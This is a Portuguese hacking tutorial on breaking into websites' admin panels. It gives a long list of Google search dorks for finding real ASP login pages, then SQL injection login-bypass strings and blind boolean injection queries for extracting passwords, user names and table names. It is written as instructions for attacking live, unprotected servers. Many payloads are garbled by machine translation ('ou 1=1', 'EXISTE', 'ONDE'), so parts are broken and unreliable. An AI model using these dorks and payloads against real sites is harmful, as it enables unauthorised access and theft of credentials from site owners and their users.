Tutorial Invadindo sites :
(LEIA: SE VOÇE USAR UMAS DAS STRINGS EM ALGUNS SERVIDORES E NÃO CONSEGUIR ACÉSSO É PORQUE O MESMO ESTA PROTEGIDO CONTRA ATAQUES DESSE TIPO. MAIS EXISTEM VÁRIOS SERVIDORES AI VULNERÁVEIS...
Vou acessar o painel administrativo de um site através de uma técnica chamada “ SQL injection “.
Primeiramente,vou ensinar a voces como pesquisarem por sites vulneraveis a SQL injection com o próprio site do GOOGLE.
1) Acesse www.google.com.br
2) Pesquise por qualquer uma das strings abaixo:
allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:/admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/login.asp
allinurl:/adm/index.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/login/default.asp
allinurl:/webmaster/login.asp
allinurl:/webadmin/default.asp
allinurl:/webadmin/index.asp
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
allinurl:/web/admin/default.asp
allinurl:/web/admin/login.asp
allinurl:/home/adm/login.asp
allinurl:/home/adm/senha.asp
allinurl:/home/adm/index.asp
allinurl:/home/adm/defaul.asp
allinurl:/menu/admin/index.asp
allinurl:/menu/admin/default.asp
allinurl:/menu/admin/login.asp
allinurl:/menu/admin/admin.asp
allinurl:/painel/admin/admin.asp
allinurl:/painel/admin/login.asp
allinurl:/painel/admin/index.asp
allinurl:/painel/admin/default.asp
allinurl:/site/admin/default.asp
allinurl:/site/admin/index.asp
allinurl:/site/admin/login.asp
allinurl:/asp/admin/login.asp
allinurl:/asp/admin/index.asp
allinurl:/pedidos/admin/index.asp
allinurl:/pedidos/admin/login.asp
allinurl:/compras/admin/
allinurl:/clientes/admin/
allinurl:/busines/admin/
allinurl:/area_restrita/admin.asp
allinurl:/area_restrita/login.asp
allinurl:/area_restrita/index.asp
allinurl:/acesso/admin.asp
allinurl:/acesso/admin/default.asp
allinurl:/acesso/admin/index.asp
allinurl:/post/admin/default.asp
allinurl:/post/admin/
allinurl:/post/admin/index.asp
allinurl:/post/admin/login.asp
allinurl:/eshop/admin/
allinurl:/eshop/admin.asp
allinurl:/eshop/admin/default.asp
allinurl:/eshop/admin/index.asp
allinurl:/comercio/admin.asp
allinurl:/comercio/admin/default.asp
allinurl:/comercio/admin/index.asp
allinurl:/news/admin/login.asp
allinurl:/news/admin/default.asp
allinurl:/news/admin/index.asp
allinurl:/imprensa/login.asp
allinurl:/imprensa/admin.asp
allinurl:/imprensa/admin/default.asp
Após voces pesquisarem,uma série de páginas serão encontradas. Wink
Arrow Geralmente quando voce acessa uma destas páginas,voce ira cair na tela de “login” do administrador,onde voce deve digitar o nome de usuario e a senha para conseguir acesso ADM do site.
É aqui que usamos o SQL injection,ao invés de colocarmos a senha,usamos algumas strings nos campos de logins,caso voce consiga acessar o painel de controle do ADM,é porque o site esta vulneravel a SQL injection.
Arrow Abaixo vou colocar algumas strings para voces colocarem nos campos de logins: ( Só lembrando que cada string serve para o campo "nome de usuario" e o campo "senha" ao mesmo tempo Wink )
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a
USE AS STRINGS DESTA FORMA :
LOGIN: b' or ' 1='
SENHA: b' or ' 1='
LOGIN: b' or ' 1='
SENHA: b' or ' 1='
ESSA STRING FAZ "PERGUNTAS AO BANCO DE DADOS SOBRE LETRAS DE SENHAS" :
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
A STRING ACIMA PERGUNTA AO SERVIDOR SE HÁ A LETRA "W" NA SENHA....
você pode obter o sistema para responder a perguntas sobre a mesa de senha.
Ele só vai responder sim (e deixá-lo em) ou não
(por recusa de entrada).
Suas perguntas devem tomar a forma
de uma consulta SQL válida. Em cada caso, use um xx para o nome
do usuário eo texto como senha.
Você pode fazer perguntas, tais como:
A senha do jake tem um w nele?
'OU EXISTE (SELECT * FROM users WHERE name =' Jake 'AND senha LIKE'% w%) e'' = '
A senha do jake começar com w?
'OU EXISTE (SELECT * FROM users WHERE name =' Jake 'AND senha LIKE' w%) e'' = '
A senha do jake tem um w seguido por d?
'OU EXISTE (SELECT * FROM users WHERE name =' Jake 'AND senha LIKE'% w% d%) e'' = '
É a quarta carta de Jake senha w?
'OU EXISTE (SELECT * FROM users WHERE name =' Jake 'AND senha LIKE' ___w%) e'' = '
Isso funciona porque o comando como
usa% e _ como curingas.
O wildcard% corresponde a qualquer string,
o curinga _ corresponde a um único personagem.
Você pode encontrar outros usuários do sistema.
Nós escolhemos para obter a senha de jake,
simplesmente porque ele foi o primeiro na lista,
mas pode haver outros. Você pode ainda só perguntar perguntas
sim / não, mas você pode encontrar
praticamente qualquer coisa que você quer
com um pouco de paciência.
Novamente você usar xx para o nome de usuário
e digite o seguinte como password:
Há mais de 10 linhas na tabela de senha?
'OR (SELECT COUNT (*) FROM users)> 10 AND'' ='
Existe um usuário com uma r em seu nome?
'OU EXISTE (SELECT * FROM users WHERE nome LIKE'% r%) e'' = '
Existe um usuário (que jake) com um uma em seu nome?
'OU EXISTE (SELECT * FROM utilizadores WHERE nome! =' Jake 'AND nome LIKE'% a%) e'' = '
Você precisa descobrir o nome do banco de dados que você está usando.
A função DATABASE () que lhe dará valor
(mas você tem que adivinhar como antes).
Quando você sabe o nome do banco
de dados a ser utilizado pode levar
palpites para os nomes das tabelas.
O banco de dados atual contêm a letra j?
'OR existe (SELECT 1 FROM dual ONDE banco de dados () like'% j%) e'' = '
Existe uma tabela chamada em um teste de banco de dados?
'OU EXISTE (SELECT * FROM INFORMATION_SCHEMA.TABLES ONDE TABLE_SCHEMA =' teste 'AND TABLE_NAME =' um ') e'' ='
Há mais de uma tabela no banco de dados (s) contendo aj?
'OR (SELECT COUNT (*) FROM INFORMATION_SCHEMA.TABLES ONDE TABLE_SCHEMA like'% j% ')> = 1 AND'''
QUER TESTAR O QUE VOÇÊ APRENDEU AKI ? VISITE AKI UM PEQUENO TUTORIAL COM UM SRVER FALSO, APENAS PARA TESTES
<-=MUNDO HACKER=.:->